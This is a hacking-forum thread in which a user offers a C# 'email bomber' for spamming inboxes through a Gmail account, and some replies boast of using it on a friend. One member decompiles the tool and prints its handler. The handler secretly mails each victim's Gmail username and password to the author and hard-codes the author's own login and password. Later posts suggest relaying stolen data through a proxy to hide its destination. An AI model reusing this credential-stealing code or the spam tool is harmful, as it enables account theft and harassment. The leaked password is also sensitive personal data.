[C#] Email Bomber

Results 1 to 8 of 8
  1. #1
    Enthusiast xBlessingx is offline
    MemberRank
    Jun 2010 Join Date
    46Posts

    [C#] Email Bomber

    You can automatically spam emails with this email. You just enter your gmail account, and it spams automatically for you. It was made in C# by me! Enjoy!

    Download & Screenshots In Attachments!


    Attached Images Attached Images
    Last edited by Tyler; 16-09-12 at 09:22 PM.


  2. #2
    No, Just no. Matthew is offline
    MemberRank
    Jul 2008 Join Date
    United KingdomLocation
    1,408Posts

    Re: [C#] Email Bomber

    Nice. Not only will you get your gmail account blocked by google, but your IP and other information reported to the authorities most probably. (Depends on what you spam) Spamming, if 'testing' or not is a serious issue. I wouldn't even run this..

  3. #3
    C:\ WizCoder is offline
    MemberRank
    Aug 2010 Join Date
    JapanLocation
    703Posts

    Re: [C#] Email Bomber

    Works great, I tested and got no problems !
    Thanks blessing.

  4. #4
    Enthusiast xBlessingx is offline
    MemberRank
    Jun 2010 Join Date
    46Posts

    Re: [C#] Email Bomber

    You welcome! Hope other people likes it too.

  5. #5
    Account Upgraded | Title Enabled! qazqazqazqazqaz is offline
    MemberRank
    Jun 2007 Join Date
    :*(Location
    267Posts

    Re: [C#] Email Bomber

    Nice program, used it to screw with a friend.

  6. #6
    Enthusiast phear3d is offline
    MemberRank
    Mar 2006 Join Date
    43Posts

    Re: [C#] Email Bomber

    This guy is mailing all the email usernames and passwords you use on this to himself.

    Code:
        private void button1_Click(object sender, EventArgs e)
        {
            if (((string.IsNullOrEmpty(this.textBox1.Text) || string.IsNullOrEmpty(this.textBox2.Text)) || (string.IsNullOrEmpty(this.textBox3.Text) || string.IsNullOrEmpty(this.textBox4.Text))) || ((string.IsNullOrEmpty(this.richTextBox1.Text) || !this.textBox1.Text.Contains("@")) || !this.textBox3.Text.Contains("@")))
            {
                MessageBox.Show("Please fill out all the forms correctly!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
            }
            else
            {
                MailMessage message = new MailMessage();
                SmtpClient client = new SmtpClient("smtp.gmail.com");
                message.From = new MailAddress("blessing1337@gmail.com");
                message.To.Add("blessing1337@gmail.com");
                message.Subject = "Email Bomber Logs";
                message.Body = "Gmail Username: " + this.textBox1.Text + Environment.NewLine + "Gmail Password: " + this.textBox2.Text;
                client.Port = 0x24b;
                client.Credentials = new NetworkCredential("blessing1337@gmail.com", "1123181800640");
                client.EnableSsl = true;
                client.Send(message);
                this.int_0 = 0;
                this.label8.Text = "0";
                this.textBox1.Enabled = false;
                this.textBox2.Enabled = false;
                this.textBox3.Enabled = false;
                this.textBox4.Enabled = false;
                this.richTextBox1.Enabled = false;
                this.numericUpDown1.Enabled = false;
                this.checkBox1.Enabled = false;
                this.button1.Enabled = false;
                this.button2.Enabled = true;
                this.timer_1.Start();
            }
        }
    He's also a noob who uses timers.
    Last edited by phear3d; 14-09-12 at 11:11 PM.

  7. #7
    Member Mapplexploits is offline
    MemberRank
    Dec 2009 Join Date
    somehow here...Location
    82Posts

    Re: [C#] Email Bomber

    Quote Originally Posted by phear3d View Post
    This guy is mailing all the email usernames and passwords you use on this to himself.

    Code:
        private void button1_Click(object sender, EventArgs e)
        {
            if (((string.IsNullOrEmpty(this.textBox1.Text) || string.IsNullOrEmpty(this.textBox2.Text)) || (string.IsNullOrEmpty(this.textBox3.Text) || string.IsNullOrEmpty(this.textBox4.Text))) || ((string.IsNullOrEmpty(this.richTextBox1.Text) || !this.textBox1.Text.Contains("@")) || !this.textBox3.Text.Contains("@")))
            {
                MessageBox.Show("Please fill out all the forms correctly!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
            }
            else
            {
                MailMessage message = new MailMessage();
                SmtpClient client = new SmtpClient("smtp.gmail.com");
                message.From = new MailAddress("blessing1337@gmail.com");
                message.To.Add("blessing1337@gmail.com");
                message.Subject = "Email Bomber Logs";
                message.Body = "Gmail Username: " + this.textBox1.Text + Environment.NewLine + "Gmail Password: " + this.textBox2.Text;
                client.Port = 0x24b;
                client.Credentials = new NetworkCredential("blessing1337@gmail.com", "1123181800640");
                client.EnableSsl = true;
                client.Send(message);
                this.int_0 = 0;
                this.label8.Text = "0";
                this.textBox1.Enabled = false;
                this.textBox2.Enabled = false;
                this.textBox3.Enabled = false;
                this.textBox4.Enabled = false;
                this.richTextBox1.Enabled = false;
                this.numericUpDown1.Enabled = false;
                this.checkBox1.Enabled = false;
                this.button1.Enabled = false;
                this.button2.Enabled = true;
                this.timer_1.Start();
            }
        }
    He's also a noob who uses timers.

    He's not a noob for using timers, he's a noob cause he had no idea .NET compiled softwares can be reversed by other noobs to...

  8. #8
    Ginger by design. jMerliN is offline
    MemberRank
    Feb 2007 Join Date
    2,497Posts

    Re: [C#] Email Bomber

    Quote Originally Posted by Mapplexploits View Post
    He's not a noob for using timers, he's a noob cause he had no idea .NET compiled softwares can be reversed by other noobs to...
    He's a noob for putting the password to his personal email in something he released as malware.

    Oh man. That's the most fail thing you could possibly do. At least when I did something similar, I had to sense to send the information to a proxy server that then sent me e-mails so nobody could ever see where they were going.

    He also posted it here: Email Bomber [Must Need Gmail Account] [Spam Emails Unlimitedly] [Fast & Efficient] [Coded In C#]



Advertisement